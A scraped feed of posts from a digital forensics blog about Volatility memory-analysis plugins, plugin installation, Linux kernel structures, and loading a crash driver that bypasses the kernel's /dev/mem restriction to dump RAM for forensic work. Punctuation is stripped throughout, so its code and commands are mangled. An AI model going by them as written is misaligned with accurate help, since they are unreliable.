05:35:28 - JL's stuff - There is an upcoming talk at John Jay College that should be interesting File Carving for Forensics Recovery Nasir Memon Professor of Computer Science Director of the Information Systems and Internet Security ISIS Lab Polytechnic Institute of New York University As the number of digital devices in use continues to increase, there has also been an increase in the seizure and analysis of digital data for forensic purposes One of the areas of high forensic interest is in the recovery of digital data from devices In cases where the file system information for a digital device is missing or corrupt, newer data recovery techniques involving a process known as file carving are used to recover the data This talk describes the need for and evolution of file carving, and presents the various technologies that have been used to improve file carving recovery, including our own Smart Carving techniques Date Tuesday, February 9, 2010 Time Reception 1 45pm, Lecture 2 00 pm Location Room 630T, Haaren Hall 899 Tenth Avenue, New York City 10019 RSVP Nicole Daniels at 212-237-8920 or email ndaniels jjaycunyedu For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, at 212-237-8836 or email dsalane jjaycunyedu http://www.secuobs.com/revue/news/186542.shtmlhttp://www.secuobs.com/revue/news/186542.shtml Secuobs.com : 2010-01-12 06:35:12 - JL's stuff - Lately I've been playing around writing plugins for Volatility A few of these will will be released at the end of this blog post, some others are still in the works to be released later During the writing of some of the more complicated plugins, I decided that I needed to have some temporary storage while doing complex processing Sure I could dump to a file and process that later, but why not do it within Volatility itself SQLite is good for this There's an option to use an in-memory database memory that will remain in memory until the process dies I also started thinking that some people might like to have a SQLite database of all the information they could get from a memory image for various reasons Hence this is what the first release of plugins is all about Luckily Volatility has an option for plugins to have more than one output option If you look at the code in forensics commandspy you'll see the following line numbers not included 82 function_name render_pourcentss pourcents selfoptsoutput 83 if not selfoptsout_file 84 outfd sysstdout 85 else 86 outfd open selfoptsout_file,'w' This allows plugins to have more than one output function For example a plugin might have a render_text function that would print to stdout as usual, a render_html function that prints out in html style, a render_sql function that does some SQL actions etc etc The framework allows the user to pick which output option s he wants and the output file on the command line as defined in vutilspy 45 def get_standard_parser cmdname 59 opadd_option '-H','--output',default 'text', 60 help ' optional, default text Output format xml, html, sql ' 61 opadd_option '-O', '--out_file', default None, 62 help ' output filename to write results onto - default stdout ' Therefore, if there is a plugin that has an xml output option, it can be invoked from the command line like so volatility -H html -O -f memdd Quite cool - Plugin Structure If you are interested in writing plugins for Volatility, you really should read Andreas Schuster's slides They go into nice detail on how to write plugins for the framework Here I will simply give you the gist - The skeleton for the plugins is defined in forensics commandspy Items of interest include the help function which is the plugin description you see when you run Volatility with the help option volatility -h Also of interest is the parser function, which allows the plugin to modify its command line options There is also the calculate function, which is where the real work is done The last item of our interest is the execute function which allows us to calculate and collect the desired data from the memory image and then output it using the plugin's chosen render_ function The plugins I'm releasing now consist of core commands defined in vmodulespy that have been converted to this code structure so I could have more than one type of output for each of these commands The plugins in this package are memory_plugins connections_2py memory_plugins dlllist_2py memory_plugins files_2py memory_plugins modules_2py memory_plugins pslist_2py memory_plugins sockets_2py Schema The schema for these plugins is quite simple and not much different than the original output for these core commands There is an extra field for the name of the memory image that was analyzed in case someone would like to place information for more than one memory image into a SQLite database This may change at some point and of course you are free to change it as you like It's enough for what I needed, however connections_2py Schema Table Name connections pid Process ID local Local connection information remote Remote connection information memimage Memory image information was extracted from memory_plugins dlllist_2py Schema Table Name dlls image_file_name Process name pid Process ID cmdline Command Line text base Base Address size Size path Path of DLL memimage Memory image information was extracted from memory_plugins files_2py Table Name files pid Process ID file Open file num Number of times file is open by pid memimage Memory image information was extracted from memory_plugins modules_2py Table Name modules file Module Path base Base Address size Size name Module Name memimage Memory image information was extracted from memory_plugins pslist_2py Table Name process pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text pname Process Name pid Process ID ppid Parent Process ID thrds Threads hndl Handle Count ctime Creation Time memimage Memory image information was extracted from memory_plugins sockets_2py Table Name sockets pid Process ID port Port proto Protocol ctime Creation Time memimage Memory image information was extracted from Installation First, make sure you have the Volatility code from the SVN Download the plugins from here A listing of the plugins is as follows tar -tzf vol_sqltgz vutilspy forensics commandspy memory_plugins connections_2py memory_plugins dlllist_2py memory_plugins files_2py memory_plugins modules_2py memory_plugins pslist_2py memory_plugins sockets_2py Make a backup of your vutilspy and forensics commandspy files if you like I had to make a small modification to both of these files to get the plugins working properly Then place the tar file into your Volatility directory and type tar -xvzf vol_sqltgz Each of the redefined core commands end with 2 so pslist becomes pslist_2 and connections becomes connections_2 and so on So if I wanted to dump the output of the connections_2 plugin to a SQLite file I would type the following volatility connections_2 -H sql -O testdb -f memdd After running all of the new commands to the same SQLite3 file, I can then look at what I have stored sqlite3 testdb SQLite version 359 Enter help for instructions sqlite table connections dlls files modules process sockets sqlite schema CREATE TABLE connections pid integer, local text, remote text, memimage text CREATE TABLE dlls image_file_name text, pid integer, cmdline text, base text, size text, path text, memimage text CREATE TABLE files pid, file, num, memimage CREATE TABLE modules file text, base text, size text, name text, memimage text CREATE TABLE process pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text CREATE TABLE sockets pid integer, port integer, proto text, ctime text, memimage text sqlite select from files where pid 4 and file like 'pourcentsSECpourcents' 4 WINDOWS system32 config SECURITY1 home levy forensic evidence 10vmem 4 WINDOWS system32 config SECURITYLOG1 home levy forensic evidence 10vmem sqlite quit You can make as many complex queries as you like now - http://www.secuobs.com/revue/news/180521.shtmlhttp://www.secuobs.com/revue/news/180521.shtml Secuobs.com : 2010-01-03 02:32:52 - JL's stuff - Into the Boxes Issue 0x0 is now out It contains a small article on Linux memory forensics I wrote as well as a cool article on Windows 7 UserAssist Registry Keys by Didier Stevens, a hardware quick tip and FTK imager quick tip by Don C Weber and a PCI interview with Harlan Carvey For those who are interested in contributing to future publications, check out the Collaboration Box Congratulations to Don and Harlan on the first release There is a new meetup group that I am helping to organize NYC4Sec The group consists of computer security, forensics and compliance professionals based in the Tri-State area and we will be meeting to discuss the latest trends in threats and responses as well as what to do when attacked We are aiming to meet at the end of the month Feel free to sign up and come to the meeting If anyone is interested in presenting at the meeting, please contact myself or Morton Swimmer I have also been asked to give a talk at CEIC 2010 So if you are planning to attend, I'll see you there - http://www.secuobs.com/revue/news/177594.shtmlhttp://www.secuobs.com/revue/news/177594.shtml Secuobs.com : 2009-12-20 20:51:28 - JL's stuff - A while back, I started blogging about dev kcore and had gotten up to the task_struct structure, promising to continue talking about it Well, it's been a while since, but I have not forgotten This will take more than one post to finish it up, however Today we will start with a brief introduction Later posts will continue our exploration concluding with some small real demonstrations task_struct So what is the task_struct structure It's a structure that contains information about what a process is doing It allows the kernel to keep track of processes that are running, the states they are in as well as other information needed by that process during execution States of the process are also defined in include linux schedh and let the kernel know if the process is running TASK_RUNNING , interruptible TASK_INTERRUPTIBLE , uninterruptible TASK_UNINTERRUPTIBLE , stopped TASK_STOPPED , being traced by a debugger TASK_TRACED , or exiting EXIT_ZOMBIE, EXIT_DEAD The task_struct structure also contains identifying information such as the process PID, thread group leader ID There are also pointers to the parent process' task_struct structure and real_parent task_struct structure for debugging purposes Also contained in the task_struct structure is information about other relationships the current process has such as children or siblings The executable name including the path is also stored in task_struct as well as current directory information and file descriptors The signal_struct structure contains information regarding signals for this process as well as tty associated with it Also contained in the task_struct is the mm_struct which contains pointers to vm_area_structs which are areas of virtual memory We will discuss mm_struct and vm_area_struct next time References Rusling, D Virtual Memory, The Linux Tutorial http wwwlinux-tutorialinfo modulesphp name MContent pageid 322 Bovet, D, M Cesati 2000 Understanding the linux kernel Cambridge O'Reilly Media http://www.secuobs.com/revue/news/174395.shtmlhttp://www.secuobs.com/revue/news/174395.shtml Secuobs.com : 2009-12-20 17:46:36 - JL's stuff - While catching up on some reading over at Harlan's blog I started thinking about all of the programming I've done in the past year or so I really appreciate all of the hard work that goes into developing programs like RegRipper and countless others It's cool when people are able to share tools they have developed to solve problems they have encountered in the field It's also cool when people who are in the field are able to solve the problems themselves I have been thinking about whether or not someone who is working in the field of digital forensics really needs to know a programming language or not My thoughts are yes which is influenced by what I see around me and may be biased, considering that I do a lot of programming , but what I can see how some people may think differently The reason why I bring this up is because this question has been in the back of my mind since my last discussion with someone from my alma mater, John Jay College John Jay's MS in Forensic Computing has been established since 2004 and it has been evolving ever since its conception The courses of the program have roughly contained a lot of hands on labs as well as theory algorithms, cryptography, network protocols etc and programming various scripting, C Linux OS in addition to Criminal Justice courses on laws regarding digital evidence The question has come up several times as to whether or not the theoretical and programming courses are needed in the background of someone who wants to be a forensic examiner When I was in attendance there, the general feeling from some not all of my colleagues was that they didn't need to learn programming and theory in order to work as a forensic examiner They said they only needed to learn how to use tool XXX or YYY and get a certification in A, B, and or C they would be set Perhaps they were right in some way, as they went on to find jobs where that was enough for them The debate continues about the direction of the program and whether or not theory and programming are needed and whether or not some kind of certification should be obtained instead Having been out in the real world for a little while, I see a lot of people who do not need any programming knowledge whatsoever to fulfill their jobs There are plenty of tools that they are more than proficient in using and I'm not knocking their skills, because they are really quite knowledgeable at what they do However, there are many times that tool XXX or tool YYY doesn't do whatever it should normally, or it cannot fulfill the job the way the client would like Having a little programming knowledge helps out immensely in these cases In addition to the EnScripts I have written at work, I have written a lot of Perl scripts, nix scripts, Visual Basic programs, SQL queries etc to get the job done I have also taken someone else's code in language X, Y or Z and tweaked it to run the way I needed it to for a particular job Now I concede that it's not every day that I need to write these customizations, but it happens enough that I'm glad I can do it I often hear from colleagues at work or elsewhere that they wish they knew how to program in X or Y so they could write their own tools to do something I have suggested books or websites from which they could glean this wanted knowledge This often comes with some stern advice that they must also practice programming if they want it to stick Some have taken my advice, some probably just don't have the time for it So after much rambling on the subject, what do you think How often do you wish are you glad that you knew how to program How often would it have helped you does it help you on your job as a forensic examiner incident responder Don't be afraid to comment I only moderate to keep down on the spam which I seem to get a lot of for some reason http://www.secuobs.com/revue/news/174384.shtmlhttp://www.secuobs.com/revue/news/174384.shtml Secuobs.com : 2009-12-20 03:27:02 - JL's stuff - I recently came across a couple of tools that may be helpful to someone and I have created a repository for some of my stuff Maatkit Maatkit has a lot of cool utilities that allow you greater control of MySQL I recently found it very useful for importing an extremely large MySQL dump by using the mk-parallel-restore For information about its feature, either visit the website or you can check out this Linux Magazine article HTMLDOC HTMLDOC allows you create PDF documents of html pages You can convert pages one page at a time, or as a book So you could use wget to download the pages of a website recursively, including the graphics and then pdf'ify it into one book with references pretty useful Some of my stuff Since I'm not sure how much longer I will have my academic website, I am starting to move some of the code that's been hosted there to another location I have also added a few things that are not listed on the old code page or elsewhere on my academic site, such as a DC3 Image Assember script that worked with the last DC3 challenge haven't looked at the current one and a Virus Total hash checker that takes a list of hashes and posts them to Virus Total to build an html report This last one needs some modification however, since if one is checking lots of files Virus Total starts to report errors Hopefully I'll have some time to create a new version in the future http://www.secuobs.com/revue/news/174339.shtmlhttp://www.secuobs.com/revue/news/174339.shtml Secuobs.com : 2009-12-13 17:53:52 - JL's stuff - Droid Forensics For those of you interested in Droid forensics, check out the viaForensics website There you can find a presentation on Droid forensics pdf as well as a regularly updated blog New Volatility Plugins MHL has been busy creating new Volatility plugins He's modified the malfind plugin to use YARA which allows one to search the process memory for defined patterns rules He also has created a new plugin called ldr_modulespy that can detect unlinked LDR_MODULE entries I suggest reading his blogpost in order to take it all in You can get the updated plugins here zip Also from his blogpost you'll see that AAron and Moyix rocked the Incident Detection Summit MDD will cease to exist It seems that development and maintenance of the MDD tool will cease For those of you who are dependent on that tool, windd is a great free alternative Into the Boxes For those of you who might not be aware, there is a new quarterly digital forensic and incident response ezine that is about to come out next month called Into the Boxes For more updates, check out their twitter feed If you are interested in contributing to future publications, you can find the guidelines here http://www.secuobs.com/revue/news/171468.shtmlhttp://www.secuobs.com/revue/news/171468.shtml Secuobs.com : 2009-11-08 17:04:21 - JL's stuff - We have received a new submission to the VDP Keep them coming - Dougee has submitted an install manual for Snow Leopard It covers installation from the official tar ball release as well as from the SVN repository It also covers installing some of the plugin dependencies Shouts to Dougee IMAGE http://www.secuobs.com/revue/news/158694.shtmlhttp://www.secuobs.com/revue/news/158694.shtml Secuobs.com : 2009-11-06 22:42:42 - JL's stuff - This is not going to be my usual banter, just something I came across yeah, I know, I'm late and thought was cool So it's no big secret that I use Google's Reader to keep up with all of my RSS feeds I had noticed that we are now able to search for shared items and hadn't really given it much thought I had even shared a couple of articles earlier in the year, but didn't really know what happened to them, or forgot that I had done so Anyway, the other day people on twitter were talking about Google Dashboard and I decided to check it out There really wasn't that much surprising until I looked under the Reader section and saw I had followers Followers For my Google reader I wanted to know what they were following So after some investigation I find my shared items feed with the two things I had shared previously I've since decided to add things to the feeder, sometimes even with notes - I know Google's got the goods on me and I'm feeding the monster, black helicopters etc etc etc but it's still a cool way to share things you read I've since subscribed to a few feeds myself - IMAGE http://www.secuobs.com/revue/news/158358.shtmlhttp://www.secuobs.com/revue/news/158358.shtml Secuobs.com : 2009-10-26 05:39:32 - JL's stuff - via Echo6 There is a new stable release of Volatility v 132 available for download Also Michael Cohen scudette and Mike Auty have been extremely busy developing Their fearless efforts could use some eyes to track down and report bugs, however If you feel like helping out, download the 132 version, test it out and report any bugs you may find You may report bugs using the Issues feature on the Google Code site You may also reach Mike Auty at mike dot auty at gmail dot com And of course you can always reach the Volatility team on IRC on the volatility channel at ircfreenodenet Mike Auty ikelos and Michael Cohen scudette are often online so you can talk to them about any bugs you encounter directly IMAGE http://www.secuobs.com/revue/news/153922.shtmlhttp://www.secuobs.com/revue/news/153922.shtml Secuobs.com : 2009-10-22 04:52:33 - JL's stuff - Earlier I had written about all of the known Volatility plugins and how to go about installing them Now I've decided to make things even easier for some, by including a bash script that will download and install all of these plugins It will also install pefile, pycrypto and pydasm I have tested it on a linux box as well as a cygwin installation Make sure you are running this as root or with sudo if you are doing this under Linux Also make sure you have subversion installed Prereqs for Cygwin Obviously you must have Cygwin installed In addition to what I have listed in a previous post, you will also need to install wget unzip svn subversion Hopefully I haven't forgotten anything let me know if I have Simply unzip the bash script into the directory where you want Volatility installed Then run the script get_pluginsbsh This bash script removes one of the example files memory_plugins example3py since it has a conflicting _EPROCESS definition, so if you want that file - simply comment out that remove statement You will have to install Inline Python yourself until I figure out a way to get it installed in a general fashion Let me know if you encounter errors IMAGE http://www.secuobs.com/revue/news/152821.shtmlhttp://www.secuobs.com/revue/news/152821.shtml Secuobs.com : 2009-10-20 21:35:23 - JL's stuff - I have updated the VDP Wiki to include some blog posts out there about using or installing Volatility There are also links to Richard McQuown's recent blogposts on his Volatility Batch File Maker and walk through There are also links to other submitted articles on installation, usage and reporting I'll continue updating the Wiki as I find other articles to add to it If anyone wants to add something new, let me know jamie dot levy at gmail dot com IMAGE http://www.secuobs.com/revue/news/152312.shtmlhttp://www.secuobs.com/revue/news/152312.shtml Secuobs.com : 2009-10-10 02:47:21 - JL's stuff - Open Memory Forensics Workshop OMFW 2010 is currently being planned If you are interested in presenting or helping out, let them know IMAGE http://www.secuobs.com/revue/news/149178.shtmlhttp://www.secuobs.com/revue/news/149178.shtml Secuobs.com : 2009-10-09 21:57:12 - JL's stuff - There's an upcoming talk at John Jay College next week that may interest some of you in the NYC area Understanding the Market for Malware and Cybercrime Thursday, Oct 15, 2009 3 15 pm, room 630T Tom Holt, Assistant Professor School of Criminal Justice Michigan State University Events will take place at John Jay College of Criminal Justice 899 Tenth Avenue between 58th and 59th Streets RSVP to Nicole Daniels ndaniels jjaycunyedu 2122378920 IMAGE http://www.secuobs.com/revue/news/149117.shtmlhttp://www.secuobs.com/revue/news/149117.shtml Secuobs.com : 2009-08-25 00:23:08 - JL's stuff - As you may or may not know, some distributions RHEL, Fedora, Ubuntu block some reads and writes to dev mem and have for some time I first came across this when writing my thesis at John Jay College Since I was trying to test the memory encryption library I had written and original tests comprised of scanning all of memory, the dev mem barrier was a bit cumbersome I had gotten around it by using a Python script called Zeppoo-dumppy project no longer maintained to overwrite the offending instructions The following code only allows access within the first 256 pages of memory usr src linux drivers char memc ifdef CONFIG_STRICT_DEVMEM static inline int range_is_allowed unsigned long pfn, unsigned long size u64 from u64 pfn pourcentsLx n , current-comm, from, to return 0 cursor PAGE_SIZE pfn return 1 else static inline int range_is_allowed unsigned long pfn, unsigned long size return 1 and from usr src linux arch x86 mm init_32c int devmem_is_allowed unsigned long pagenr if pagenr 101200 So there has be a way around this, right Checking the Redhat Crash Utility listserv yielded some good advice There are three courses of action proposed 1 Rebuild your kernel without the CONFIG_STRICT_DEVMEM restriction 2 Port the Fedora dev crash driver drivers char crashc to your kernel 3 Write a kretprobe module that tinkers with the return value of the kernel's devmem_is_allowed function such that it always returns 1 I don't want to recompile the kernel since I'll loose whatever is currently in memory, so I'll focus on 2 Since I am currently using Ubuntu instead of Fedora, I knew I would have to port the code over So I found a copy of crashc and crashh and set to work You can find the ported crash driver here as well as a Makefile Now, I take NO responsibility for what may happen to your machine if something goes wrong during installation This is for a 32bit system, and I have only tested this on Ubuntu Ibex kernel 2627-14-generic I still need to do some testing and will probably have more to say about that later That being said, we'll continue Grab the tar file from above and extract tar -xvzf crash_driver_ubuntutgz crash_driver crash_driver crashh crash_driver Makefile crash_driver crashc Go inside the newly created folder and compile the kernel module cd crash_driver ls crashc crashh Makefile make make -C lib modules 2627-14-generic build M home levy crash crash_driver modules make 1 Entering directory usr src linux-headers-2627-14-generic' CC M home levy crash crash_driver crasho Building modules, stage 2 MODPOST 1 modules CC home levy crash crash_driver crashmodo LD M home levy crash crash_driver crashko make 1 Leaving directory usr src linux-headers-2627-14-generic' At this point you should have the following files ls crashc crashh crashko crashmodc crashmodo crasho Makefile Modulemarkers modulesorder Modulesymvers The file of interest is the crashko kernel module We will load this into the kernel and check that it is installed correctly insmod crashko lsmod grep crash crash 10368 0 ls -l dev crash crw-rw---- 1 root root 10, 59 2009-08-24 15 04 dev crash tail -n 1 var log messages Aug 23 15 04 10 comp name kernel 19030855920 crash memory driver version 10 So now we have a new device we can use to access memory dev crash dd if dev crash of crashdd dd reading dev crash' Bad address 6812680 0 records in 6812680 0 records out 3488092160 bytes 35 GB copied, 157964 s, 221 MB s I'm not yet sure what the Bad address error means, but I suspect it is because dd tried to read beyond the 33 GB of memory that I have available You can remove the crashko module like so when you are finished rmmod crash Now let's test the newly obtained memory dump to see if it works I'm going to use the RH Crash Utility with the volatile patch which you can find here crash -f boot Systemmap-2627-14-generic usr src linux-source-2627 vmlinux crashdd --volatile crash 40-89 Copyright C 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Red Hat, Inc Copyright C 2004, 2005, 2006 IBM Corporation Copyright C 1999-2006 Hewlett-Packard Co Copyright C 2005, 2006 Fujitsu Limited Copyright C 2006, 2007 VA Linux Systems Japan KK Copyright C 2005 NEC Corporation Copyright C 1999, 2002, 2007 Silicon Graphics, Inc Copyright C 1999, 2000, 2001, 2002 Mission Critical Linux, Inc This program is free software, covered by the GNU General Public License, and you are welcome to change it and or distribute copies of it under certain conditions Enter help copying to see the conditions This program has absolutely no warranty Enter help warranty for details GNU gdb 61 Copyright 2004 Free Software Foundation, Inc GDB is free software, covered by the GNU General Public License, and you are welcome to change it and or distribute copies of it under certain conditions Type show copying to see the conditions There is absolutely no warranty for GDB Type show warranty for details This GDB was configured as i686-pc-linux-gnu SYSTEM MAP boot Systemmap-2627-14-generic DEBUG KERNEL usr src linux-source-2627 vmlinux 262718 DUMPFILE crashdd CPUS 2 DATE Mon Aug 23 12 31 54 2009 UPTIME 02 44 55 LOAD AVERAGE 010, 017, 017 TASKS 252 NODENAME -- RELEASE 2627-14-generic VERSION 1 SMP Tue Aug 18 16 25 45 UTC 2009 MACHINE i686 1994 Mhz MEMORY 32 GB PID 0 COMMAND swapper TASK c0471340 1 of 2 THREAD_INFO c04aa000 CPU 0 STATE TASK_RUNNING crash So far so good - crash ps PID PPID CPU TASK ST pourcentsMEM VSZ RSS COMM 0 0 0 c0471340 RU 00 0 0 swapper 0 0 1 f744e480 RU 00 0 0 swapper 1 0 0 f7448000 IN 01 3056 1900 init 2 0 1 f7448c90 IN 00 0 0 kthreadd 3 2 0 f7449920 IN 00 0 0 migration 0 4 2 0 f744a5b0 IN 00 0 0 ksoftirqd 0 5 2 0 f744b240 IN 00 0 0 watchdog 0 6 2 1 f744bed0 IN 00 0 0 migration 1 7 2 1 f744cb60 IN 00 0 0 ksoftirqd 1 8 2 1 f744d7f0 IN 00 0 0 watchdog 1 9 2 0 f744f110 IN 00 0 0 events 0 10 2 1 f7460000 IN 00 0 0 events 1 11 2 0 f7460c90 IN 00 0 0 khelper snip crash foreach files PID 0 TASK c0471340 CPU 0 COMMAND swapper ROOT CWD No open files PID 0 TASK f744e480 CPU 1 COMMAND swapper ROOT CWD No open files PID 1 TASK f7448000 CPU 0 COMMAND init ROOT CWD FD FILE DENTRY INODE TYPE PATH 0 f69c8300 f700c550 f695a3e0 CHR dev console 1 f69c8300 f700c550 f695a3e0 CHR dev console 2 f69c8300 f700c550 f695a3e0 CHR dev console 3 f69c8f00 f720d770 f7243c38 FIFO 4 f69c8780 f720d770 f7243c38 FIFO 5 f69c86c0 f7218990 f7045228 SOCK 6 f69c8b40 f70216e8 f70b6000 DIR inotify PID 2 TASK f7448c90 CPU 1 COMMAND kthreadd ROOT CWD No open files PID 3 TASK f7449920 CPU 0 COMMAND migration 0 snip crash foreach net foreach WARNING net command requires -s or -S option PID 0 TASK c0471340 CPU 0 COMMAND swapper No open sockets PID 0 TASK f744e480 CPU 1 COMMAND swapper No open sockets PID 1 TASK f7448000 CPU 0 COMMAND init FD SOCKET SOCK FAMILY TYPE SOURCE-PORT DESTINATION-PORT 5 f7045200 f6bfe380 UNIX DGRAM snip In order to compile the kernel so that you can use the RedHat Crash Utility, you can follow the Ubuntu tutorial After installing the appropriate packages you may have to run the following command sudo apt-get build-dep linux You should end up with a linux-source tarbz2 file under usr src You should also have at least one folder with the kernel headers for your current kernel You can extract the tarbz2 file as so tar -xjf linux-source tarbz2 Go into the resulting folder and set following flag in the Makefile CFLAGS_KERNEL -g Copy the config file from your usr src linux-headers- uname -r folder into the usr src linux-source- uname -r folder Now type make After the kernel is finished compiling, you should end up with a vmlinux file This is the file with the kernel debugging information that you need in order to run the RH crash utility For more information on the RH Crash Utility, check out Official RH Crash Utility Website Linux Memory Forensics by A Walters, M Cohen and D Collett slides from CEIC IMAGE http://www.secuobs.com/revue/news/133821.shtmlhttp://www.secuobs.com/revue/news/133821.shtml Secuobs.com : 2009-08-21 07:15:22 - JL's stuff - I have volunteered to help with the Volatility Documentation Project VDP for Volatility If you have something you would like to contribute, please feel free to email me at jamie - dot - levy - at - gmail - dot - com Contributed documents will appear on the Volatility Google Code website We have two new contributions by SAL VolReport win with an accompaning batch script as well as a manual covering the visual capabilities of Volatility Keep them coming - IMAGE http://www.secuobs.com/revue/news/133052.shtmlhttp://www.secuobs.com/revue/news/133052.shtml Secuobs.com : 2009-08-12 23:43:45 - JL's stuff - So you've already installed Volatility using SVN and you want to try out some of the community plugins that people are raving about Publicly known plugins are listed on the forensics wiki The wiki contains links to plugins as well as links to blogposts articles for further information on installation, dependencies and how they work Most plugin installation is straightforward where one may simply place the plugin in the memory_plugins directory within the Volatility directory Some are only slightly more complicated by needing a helper library installed in addition to the plugin itself Therefore we have three cases for plugin installation please visit the forensics wiki for more information 1 Simple Case - only in memory_plugins volshell IDT cryptoscan orphan_threads keyboardbuffer getsids moddump objtypescan symlinkobjscan driverscan fileobjscan pstree 2 More Complex Case - also supporting file s driverirp needs driverscan threadqueues needs listspy ssdt needs listspy 3 Most Complex Case - installation of supporting libraries malfind needs pydasm and pefile kernel_hooks needs pefile usermode_hooks needs pefile volreg needs pycrypto VolRip needs volreg and Inline Python Simple installation of volshell For an example of a simple installation, we will install the volshell plugin Simply download the volshellpy file and place it into your memory_plugins directory You can test to make sure that is installed correctly by running Volatility without any arguments and volshell should appear under Supported Plugin Commands highlighted below in Figure 1 All other simple case plugins should install the same way Figure 1 Installation of volshell More Complex Cases The ssdt and threadqueues plugins require that the listspy library file be placed in the forensics win32 directory in addition to placing the ssdtpy and threadqueuespy into the memory_plugins folder as before The driverirp plugin requires the driverscan plugin in order to work Both of these plugins are placed in the memory_plugins directory After placing the files in the appropriate places, check to make sure that the plugins are properly installed by running volatility without any arguments as before and checking under Supported Plugin Commands Figure 1 Most Complex Cases For the most complex cases other libraries must be installed for the plugin to work properly First we will look at installing the malfind plugin First of all, download the malfindpy plugin file and place it in the memory_plugins directory Now you must install the pydasm and pefile libraries In order to install the pydasm library, you will have to do some initial setup including by installing a gcc compiler and make For this tutorial, we will use MinGW Figure 2 Sourceforge download site for MinGW Download the windows installer for MinGW from the sourceforge website Figure 2 Double click to install Figure 3-9 Figure 3 Choose Download and Install Figure 4 Click Agree Figure 5 Choose Current Figure 6 Choose compilers and MinGW make You do not necessarily have to install all compilers however, for simplicity, do a full install Figure 7 Choose location for installation The default is fine Figure 8 Installing Figure 9 installation complete Once the installation is complete and you have clicked finish, you will have to make a few adjustments to the installation in order to get things working properly First of all, we need to have an executable called makeexe The make executable for MinGW is appropriately named mingwmakeexe Simply copy this executable and paste it into the same directory C MinGW bin which should result in an identical copy named Copy of mingwmakeexe Rename this executable to makeexe as shown in Figures 10-11 Figure 10 Copy of mingwmakeexe Figure 11 Rename to makeexe Now we have to modify our path to include the executables for MinGW If you have a regular start menu, click on start and then right click on My Computer and choose properties If you have the classic start menu, just right click on My Computer and choose properties Click on the Advanced tab and then click on Environmental Variables Click on the Path system variable towards the bottom of the window and click the Edit button We will append the path of our Python installation to the end of the existing Path variable Where it says Variable Value go to the end of the line and add the following if you installed MinGW in a different location, modify appropriately C MinGW bin Figure 12 Adding C MinGW bin to the path variable Now for installing pydasm Download the source code for libdasm The easiest way to extract the contents from this tar ball is using 7zip Once you have 7zip installed, you can associate all zip files by starting the 7zip Filemanager Start-Programs-7-zip-7-zip File Manager and clicking on Tools-Options and clicking Select all in the system tab and OK Figure 13 Figure 13 Associating zip file types At this point you are ready to extract the libdasm pydasm source code Double click the downloaded pydasm tar ball You should see the following Figure 14 Opening libdasm tar ball with 7-zip Double click on the libdasm tar file inside from within the 7-zip application until you see a folder icon with the name libdasm-15 or other version number Figure 15 libdasm folder Highlight the folder and then click on the extract button and say OK The folder will extract with all source code inside to the path you choose, or by default the current directory Figure 16 Extracting the libdasm source code Now open a command prompt and change directories until you are in the newly extracted libdasm folder Type the following commands make cd pydasm python setuppy build -c mingw32 python setuppy install That's it You've installed pydasm Now you are ready to install the pefile library Grab the zip file or tar ball of the source code and extract is as you did before Go into that resulting folder and type the following python setuppy build python setuppy install Now you've installed pefile Now you should see the malfind plugin listed under supported plugins for Volatility All the other plugins that were depend on pefile should work as well if they are installed in the memory_plugins directory Installing the volreg plugin requires pycrypto Simply go the gitweb interface for this project and download the latest git snapshot by clicking on snapshot This will download a tar ball file of the source code Simply extract it as you did before, then open the command prompt and change into that directory Then type the following python setuppy build python setuppy install You've now installed the pycrypto library Download the volreg tarfile and extract the contents into your Volatility folder by double clicking as before, selecting all three folders and changing the extraction path to your Volatility folder All files should be placed into the correct location Figure 17 Extraction of volreg into Volatility directory Next time we will cover the volrip plugin after I figure out how to get Inline Python working under windows IMAGE http://www.secuobs.com/revue/news/130354.shtmlhttp://www.secuobs.com/revue/news/130354.shtml Secuobs.com : 2009-08-04 06:47:15 - JL's stuff - Since the last post on Volatility some of you may be wondering how you may download the newest source of Volatility from the Google SVN repository Well for Linux it's very easy After you install subversion using yum or apt-get, you simply follow the instructions on the website svn checkout http volatilitygooglecodecom svn trunk folder name where folder name is replaced by the name of the folder you want to contain the downloaded code For Windows users, it's only slightly more complicated First you must install a subversion client For this post we will use Tortoise SVN Figure 1 Tortoise SVN website Go to the downloads section and choose the appropriate installer For this post we are choosing the 32 bit version Figure 2 Tortoise SVN website - downloads section Once you have downloaded the installer, run it You may see the following security warning, just click Run All defaults should be fine, so keep clicking next until the installation finishes Figure 3 and 4 Running the Tortoise SVN installer After the installation is complete, you will have to restart your computer After restart you should see the following menu added when you right click Figure 5 Tortoise SVN right click menu options Create a folder for the repository for this run through we will create a folder called Volatility on the root of the drive C Right click and choose SVN Checkout noted in the picture above After choosing this menu, you should see the following Figure 6 Filling in options to download Volatility Paste the url of the repository http volatilitygooglecodecom svn trunk in the first text box and the location of the newly created folder in the second text box as shown above Leave the other options the same as shown above Press OK You should see the following as it begins downloading and then finishes Figure 7 and 8 Downloading Volatility from SVN The newly created folder should now contain the SVN repository This includes another folder named Volatility that contains the actual source code If you go inside the inner Volatility folder you should see the python source code files as shown in Figure 10 Figure 9 and 10 Newly created folder containing Volatility SVN repository To test the newly downloaded code, open a command shell, go inside the Volatility folder which is inside your newly created folder and type python volatility without the quotes This is assuming you have already installed Python, which is covered in the installation manual See below Figure 11 Running Volatility Now you're set You have the latest source code for Volatility Next will be how to install plugins IMAGE http://www.secuobs.com/revue/news/127706.shtmlhttp://www.secuobs.com/revue/news/127706.shtml Secuobs.com : 2009-08-03 21:09:44 - JL's stuff - Occasionally I have needed to make screencasts for my students so that they would have something to look at in their own time There are two tools that make this easy on Linux both should available in the yum or apt repositories recordmydesktop ffmpegorg Recordmydesktop does as it sounds it records the desktop It has options to set the size of the area to record as well as the window you would like to record I like to choose the window option myself I also like to record without sound, but you can figure out how to modify the script to remove that option if you so choose FFmpeg is a nice tool that allows you to convert, record and stream audio and video I use it to convert the resulting video from recormydesktop to flv format in order to upload to photobucket or elsewhere To make my life easier, I have created the following script that takes in 1-2 arguments The first argument should be the desired name of the resulting video file The second argument is an optional amount of time to wait before recording The default wait time is 3 seconds When you run the script it waits for you to click on the window that you wish to record by using xwininfo to get the window id number You will notice that the mouse changes to a sign as it is waiting for you to click Once you click the window, it will begin recording that window area after the appropriate wait time has transpired The video is converted to chosen filename flv after you have stopped recording CTRL C in terminal from which you started the script Feel free to do with as you please The script can be found below bin bash Warning this does not have robust error checking bad 67 if -lt 1 then echo Usage 0 filename optional time exit bad fi 